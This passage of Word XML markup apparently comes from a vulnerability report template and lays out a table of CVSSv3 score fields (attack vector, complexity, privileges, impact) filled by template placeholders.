            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000108" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>CVSSv3 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000010A" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{@cvss.cellColor}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000010B" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>cvss.baseMetricScore</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="75ADDD6F" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="150"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000010C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSSv3 </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>criterias</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000010D" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Attack </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Vector :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000010E" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>cvssObj.AV</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000010F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Scope :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2837" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000110" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>cvssObj.S</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="2A14E54F" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:vMerge/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidRDefault="00027506" w14:paraId="00000112" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000113" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Attack </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Complexity :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000114" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{cvssObj.AC}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000115" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Confidentiality :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2837" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000116" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>cvssObj.C</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="7EADD672" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:vMerge/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidRDefault="00027506" w14:paraId="00000118" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000119" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Required </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Privileges :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000011A" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{cvssObj.PR}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000011B" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Integrity :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2837" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000011C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>cvssObj.I</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="6E08CFF1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="149"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:vMerge/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidRDefault="00027506" w14:paraId="0000011E" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000011F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">User </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Interaction :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000120" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>cvssObj.UI</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000121" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Availability :</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2837" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000122" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
